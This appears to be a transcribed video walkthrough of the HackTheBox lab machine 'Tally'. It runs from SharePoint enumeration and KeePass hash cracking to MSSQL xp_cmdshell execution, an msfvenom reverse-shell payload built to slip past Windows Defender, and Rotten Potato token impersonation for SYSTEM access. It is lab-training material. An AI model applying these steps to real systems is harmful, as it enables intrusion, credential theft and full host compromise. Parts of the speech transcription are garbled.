Welcome back. In today's video, we're going to talk about hacking a website with SharePoint and MySQL. And we're going to take a practical example from HackTheBox. The machine name is HTTP Tally, and it is ranked as hard. So what's exactly SharePoint? And what is the process of hacking, or let's say pen testing a website running SharePoint? So SharePoint is a platform or collaborative platform, part of Microsoft Office suite. Normally it is actually installed with Exchange server and Active Directory, but you get to choose whether to install SharePoint or not, whether you have collaborative work with your let's say colleagues in your company. So most of the time SharePoint is used as let's say a community, internal community, so that colleagues and workers exchange information, upload files, and also exchange updates. So that's the point of SharePoint. But sometimes SharePoint can also be hosted publicly, and they can also be run on web servers. That's the case we have today. Normally when SharePoint is running on a website, it is actually hosted behind, or it's running MySQL as a database server. So what's the process looks like? So first we have to enumerate directories in SharePoint. That's the first step. We see what are the directories. Maybe we can find something plain text, or we can see if there are API keys, credentials leaked or left in one of the exchanged files in the platform. Next, we try if we have a luck in accessing the MySQL server, or actually it is MS SQL server, not MySQL here, so MS. So we see if we can try our luck to access the MS SQL server. Normally the default username for MS SQL server is SA. That's the default username for Microsoft SQL server. So we can try different techniques to access the MS SQL server, but in this scenario we will encounter the credentials in one of the files shared in the SharePoint platform. Once we access the MS SQL server, our mission becomes easy. We can escalate the privileges from MS SQL server to complete shell. And you can do this using, actually, we have two methods. The first method is using MSF Venom, Metasploit, MSF console, okay? And the next method, you can log in to my Microsoft SQL server with the SQ, I forgot the name of the software, actually it was SQSH something, and then you can escalate or execute features that enable you to execute system commands. The features we're looking to execute is XP CMD shell. You can execute this feature once you log in with this program. Next, unique to this case, we have to bypass Windows Defender in order to maintain shell access. And lastly, we will do privilege escalation. So the privilege escalation for this scenario relies on enumerating what are the privileges of the current user. We will see that the user that we will have shell with has the C impersonate or say impersonate privilege. If you see this privilege for any user, you can try your luck with the rotten potato exploit. So once you see this, next step is to try the incognito module in Metasploit, or you can use the rotten potato. So that is the scenario for today. Let's now jump and see what it looks like. So we did the nmap scan. We see from the nmap scan results, we've got several open ports. Among the open ports, we have port 80, and as you can see, it's running Microsoft SharePoint. And the web server is Microsoft IIS version 10.0. That's the main work with this machine. And you can see we have FTP server open, and the software is Microsoft FTPD. and several other open ports, among which we have the NetBIOS, and also we have, let's see here. So these are actually the open ports we have. Now let's go to the browser and navigate the SharePoint installed on the web server. So enter that, and we see we land on the home page. We've got the option to sign in, but it needs our username and password, and we don't have any, so it throws an error 401 unauthorized. So what to do now? We're gonna do directory enumeration on that. So let's see here, scroll down, and we sudo go buster, and that's the command. So basically we specify the URL and we specify the word list. That's the key here in enumerating directories on a website running SharePoint. We use SIG lists, discovery web content, CMS, SharePoint.txt. It contains a good deal of directories that we may find on the server. So we run. Of course, it's gonna throw many directories here. I'm gonna skip to the point and give you the 3 directories that you will work on with this challenge. So, and actually the 3 directories, they coincide with the 3 most used directories on SharePoint server. Regardless of the results from the GoBuster scan, most of the time when you first encounter a SharePoint site, make sure to enumerate these 3 directories first. So we have shared documents, forms, all items, layouts, view lists, site pages, forms, all pages. Most likely they contain information that we need in our information gathering phase. So let's go now and enumerate these directories one by one and see what is the content. I'm gonna stop this. I showed you the way. Let's go now to this page. And let's also take the next one. And let's also take the third one. Let's see what kind of items have been shared in this SharePoint server between supposedly or hypothetically, let's say, the colleagues. Oops. All right, so the first one. So once opening the all items, we can see we have a document saying FTP details. Now, if you click on this document, you will be able to download that, and also you can see what kind of details in that. Let's see. Next one. Oops, what happened? Okay, desktop, fine. Let's open this one. Okay, once opening the document, we see we have, as expected, we have the FTP details, hostname, tally, work group, and the password. So let's copy the password and log into the FTP server. So FTP, the username was FTP_user, and the password, we got the password, and now we actually are logged in. So let's now enumerate the directory, FTP directory, and see what do we have. ls. Now we have from custodian, intranet logs to upload, and we have user. Okay, so we can now spend time enumerating these directories, but let's now skip to the point and go right to the directory where we have our information that we're after. So cd user ls, and now as you can see, I have administrator, acta, Paul, Tim. Due to the variety of files and directories, I'm not going to spend time enumerating one of these because I did this before. I'm going to just skip to the one that works. So cd Tim, and inside Tim we have files and we have projects. If we cd to files, you can see we have bonus, KeyPass, and tim.kdbx. So All of you know that any file with the extension KDBX means this file is a password database. Password database built on KeePass software. So what we need to do here, we're gonna need to download this to our machine and perform a cracking process on this. So get team.kdbx, and now we're gonna keep the FTP as is, split this, and see if we have downloaded the file. And yes, team.kdbx. Now, how do we crack this kind of file? So let me go to my notes and see how can I crack this. I'm gonna search here for KeePass. Okay, the first thing, we're gonna need to extract the hash with KeePass to John, and then we can use John the Ripper. And while using John the Ripper, we're gonna have to specify the format. The format is KeePass, and we use RockU. And alternatively, we can use hashcat. The mode is 13,400, so it's up to you which one to use. Okay, so I'm gonna use KeePass to John. So KeePass to John, and the file is team.kdbx. And anything else to specify? Yeah, that's it. We're gonna send the result, which we know it is hash, to a file called hash or tim hash. So cat hash. Oh, yeah, that tim hash. And indeed, now we have the hash. Now we can use John the Ripper to crack this hash. So John or sudo John dash format equal KeePass and dash word list equal user share word lists rocku.text. Password files required but non-specified. Did we miss something? Oh, we missed the hash file. So lastly, we specified the hash file tim hash. And now let's wait for John the Ripper to find the password. So obviously this will take long, and I'm not gonna wait for this to finish. You can guys run the command on your own, and you can wait for the hash to be cracked. Once the hash is cracked, you will find the password needed to open the tim database file. Once you open team.kdbx, you will find pair of credentials. You will use the pair of credentials to log into the SMB server. So the process goes like that. What you can do, actually, you can try to log in using this command. Let me see. So SMB client-l, specifying the IP and the username. Once you enter the password you found from the KeePass file, you will see we have several shares. Among the shares, we have ACCT. If you want to log in and enumerate this share using SMB client, you can use this command, but for me it doesn't work because I have to do some adjustments on the SMB configurations. So for now, I'm not going to do this. Alternatively, I'm going to use the sudo mount to mount the full share to my local machine. So I use this command to mount the share. I specified the IP and the share I want to mount and the destination on my local machine. Of course, I specified the username and the password I found from the KeePass file, and once you hit enter, it will dump all the contents to your local machine. Let me now go to the directory here and ls. So we see we have several directories. We have customers, fees, invoices, payroll. So among these directories, the one that's interesting is ZZ migration and also ZZ archived. These two directories, you will find interesting information. So let's go to ZZ archived. See, the machine is lagging. Okay, ls 2016 audit, fund, and SQL. If you go to SQL, You can see we have a text file, cat this file, and we can see all server details. Database SA and the password have changed for Tally. So this is kind of hint, guys, that you need to look for the database credentials in the same working directory, which is Tally itself. It means the password or the new credentials are probably found somewhere else, but in the same directory or in the same structure we have found. So I'm gonna cd back ls and go to ZZ migration. The name is indicative of something about configuration or passwords being changed or something else. You know, it's the word migration gives you that indication. So let's discover what is in there. ls. Okay, so integration, binaries, backup, and install notes. So if you go to binaries, all right. Now I know many files, actually, so much to enumerate, so much to discover. Again, skipping to the point, cd and go to a new folder. Inside new folder, we have also several binaries. Among the binaries, we have tester.exe. If we run strings on tester, let's take a look at the strings. Scroll to the very up and see here. Scroll down, you will see this line, driver, SQL server Tally, and the board database name and the UID, and here's the password. Now there you go, these are the credentials to log into the Microsoft SQL server. So we grab the password, okay, and now we use an interactive shell to log into that. So sqsh -u or -s, specify the server name. Let me first get out of this directory because it's lagging. I'm gonna close that, and here sqsh -s, specify the server name and specify the username itself, SA. And now we're going to supply the password, which we found. Login failed. Let's see what is the password we have just copied. Let's try without the semicolon. I just copied that with the semicolon, I don't know why. Paste. And yes, we are logged in. So obviously, guys, once you log in, our option or our objective is to convert the access from just MS SQL access to shell access. So what we're gonna do, we're gonna need to configure some options to enable command execution. Let me go to database. Let's see here. Is it here? Okay. So we're going to enable the xpcmd shell feature in order to execute system commands. So let's copy that. And before enabling that, let's show the advanced options. And say go. For every command we execute using this interactive program, we need to put go to run this command. Configuration options show advanced options, change from 0 to 1, run the reconfigure statement to uninstall. Alright, so next, paste this one more time. Nope. Go back, copy that, and paste it here. So now we're going to enable the xp_cmd shell. One, and say go. So for some reason I cannot turn this on, which means we cannot run system commands using this interactive program. So what to do now? How to just execute system commands? We're gonna now use actually Metasploit. We will generate a payload and use an auxiliary module in Metasploit to log into the Microsoft SQL server and execute our payload. So to give you an idea what I'm gonna do here, the first thing I'm gonna search for MS SQL, and what we will need, guys, we will need the one that lets us log in to the Microsoft SQL server and execute system commands at the same time. #dump login ping. Let's scroll down. So this one lets us log in, right? But it doesn't let us execute system commands. So we're gonna need the other one. Well, let's see here. I don't think we have it. Auxiliary scanner admin SQL file. So this one, Microsoft SQL server escalate execute as, and this one Microsoft SQL server XP_CMT. That's what we need actually. So let's get this one and say use show options. So we will need the password, our hosts, our ports, username. So username is the same, SA. We're gonna need now to set the password. And also we will need to set a CMD command to execute. For that, we will need to generate a payload with MS Venom. We know that we're dealing with Windows machine, specifically Windows Server machine. This means that Windows Server is uninstalled, and we're gonna have to bypass that with simple evasion techniques. So let's first set the password. Set password. Okay, set our hosts 10.10.10.59. Now we're gonna open a new tab and generate a new payload with MSF Venom. So sudo MSF Venom -p Windows x64 shell underscore. We want this to be meterpreter reverse TCP stageless payload, and specify the lhost, which happens to be my IP address. And now we specify the L port we want, equal, let's say 4545-F. And now here I want to specify a format which will make the payload bypass the protections on Windows Server or Windows Defender. So we can use PSH reflection and make this a PowerShell payload. So PSH -o, and the payload name will be, you can name it as payload PS1, no problem on the name. Alright, now the payload has been generated. Let's now go back and specify the payload in the command, in the CMD parameter. So set CMD, and between double quotes we're going to specify the command. Since this is a PowerShell payload, we're going to run this with PowerShell. And don't forget to specify the execution policy. We're going to bypass the execution policy to enable the script execution. So execution policy, and say bypass, no exit. And lastly here we specify the file. So the file is the payload, but we will need to upload the payload first, which is here. So for that to happen, we're going to need to log into the FTP server again and upload the payload. Let's see if we have access to FTP server. Indeed we have access. close the connection. All right, let's exit and log in one more time. So FTP underscore user, and the password was in the FTP details. Let's open the file and grab the password. ls. All right, so where to upload the payload? We have several options. The option that worked is uploading the payload under intranet. So cd intranet ls binaries. Okay, let's stop here and put the payload. So say put payload.ps1 ls, and now we have our payload uploaded to the right directory. Now we go to Metasploit, and here we continue specifying the command to execute. So then we specify the file to execute, file, and specify the path. The path is C, and then we have FTP directory, and after that we have intranet, to which we uploaded the payload as you saw, and the payload name payload ps1. Let's make sure everything is correct. So here we have 1 backslash. Okay, what else? So username, our port is already specified, our host. Before we run this, we're gonna need to set up a listener. So we go to MSF and we set up a listener using the multi-handler. So use exploit multi-handler set using configured payload generic shell underscore. Nope. Let's see the options. Set payload windows. It needs to be the same payload we used in the MSF Venom. So meter, operator, reverse, TCP, show options. Okay, set lhost. What's happening? Set lport 4545, and now we run this. Now we're listening for incoming connections. Let's go to the module here and exploit or run. The server may have xp underscore cmd shell disabled, trying to enable it. Okay, so what do we have? Cannot bind parameter scope, cannot convert value bypass to type. Unable to match the identifier name bypass to a valid enumerator. So what's the problem here? Execution policy. What we forgot to add here, guys, is the dash. So we're gonna go back, set cmd, and I'm gonna copy this one more time. And in here, one dash, it's gonna make a difference now. Run. All right, and now we have opened one interpreter session, so that worked, and the payload has been executed. Notably, the payload has been successful in bypassing the protections, namely Windows Defender. The first thing we would do always when we get access is the sysinfo tally Windows 2016 x64, and here's the language architecture. Okay, now I will specified at the very first of this video, we're gonna need to see the privileges of the current user. So you can type ID, who am I? Oh, I forgot we are under interpreter. All right, so let's see the help menu now, see what kind of commands we can use. Let's see here, networks, system commands. Okay, So with get privs, we can attempt to enable all privileges available to the current process. Get PID, get the current process. Most probably we will use this one to see the current privileges. So get privs. And among the privileges we have C impersonate privilege, which means we can run the potato exploit on this machine. Of course, we're gonna need to upload the exploit first. So basically, if you go to this web page, all right, we can clone this one to our local machine in a new tab. Git sudo git clone obviously it's a large file. Okay, cd to rotten potato. All right, we will use the exe version. Exe. Let's see here. Debug, release, cd release, or x64. MSF rotten potato. So we got this one. Let's see debug and see also if we go to release here, see what we have. And we got this one. Oh no, so we're gonna only use the x64 one. So cd back, cd x64. Okay, so we're gonna copy that. Into desktop. Okay, cd desktop, and now we have the exploit here. So back to interpreter. Okay, we're gonna need to upload this. So ls, see where we are. Did it stop? Okay. Let me drop to shell, would be easier. So now we're gonna cd to cd back. Okay, cd users dir. So we have several users. ID. Who am I? So we are Sarah. So it's preferable if we upload the actual exploit to Sarah. So cd Sarah, cd desktop. Oh, okay, there. And here you have some other files. Among the files we have the user.txt flag, but we don't bother with flags for now. All right, so we're gonna get back to interpreter now. And now we will upload the file to Sarah. So first cd to Sarah. And upload. The file name was this one. Alright, so we uploaded the exploit successfully. Next, we will need to load incognito module in Metasploit in order to execute this one. So load incognito. Let's list the available tokens. And from the available tokens, we're gonna see which one to impersonate. Since we have the privilege, C impersonate privilege enabled, we can now impersonate privileges. So let's list tokens -u tokens available, service SQL server agent, and we have Sarah. Okay, let's now execute the payload itself, and after we execute, we can list the tokens again, see if we can so after we execute now the rotten potato itself, hopefully the list of tokens will change to include the net authority system. So now we're gonna see execute -hc-f and specify the file path, users Sarah desktop, and the file name is this one. Okay, list the tokens now. Hopefully we will see the net authority system. Nope. So the net authority system is not available yet. Impersonation tokens available, not available. So we haven't got any tokens for impersonation. I think the exploit or the rotten potato exploit didn't work. So I'm gonna need to use another link. So using this link, we can also download this one, rotten potato. So going back, sudo git clone all right, upload this back. Okay, upload. So cd rotten potato. Now we're going to copy this one to desktop. Okay, upload rotten potato. All right, now we execute this time. List tokens -u, and finally we see a token to impersonate. Now the token to impersonate is under net authority system, which is actually the thing that we want. So last step, impersonate token, and let's copy this one. Impersonate token. See that we got a typo here. Impersonate, and lastly shell ID, who am I, and you are the net authority system. So we cd back, cd administrator, there, and we get the flag. Alright, so before I go, I wanted to tell you guys that I launched a new membership level on my channel in which you can access special training videos and courses. What it looks like, so basically once you subscribe to this level, you will be able to access the courses and the field notes. The field notes is actually a directory in Google Drive which contains set of notes. The notes are taken from my Obsidian and converted into PDF files. You can find them here. The access is only online, and for the courses you can click on that and you can find. Right now I have two courses, one application penetration testing, and also I have Metasploit is under development. So that's what I wanted to tell you guys before I just close the video. So see you later.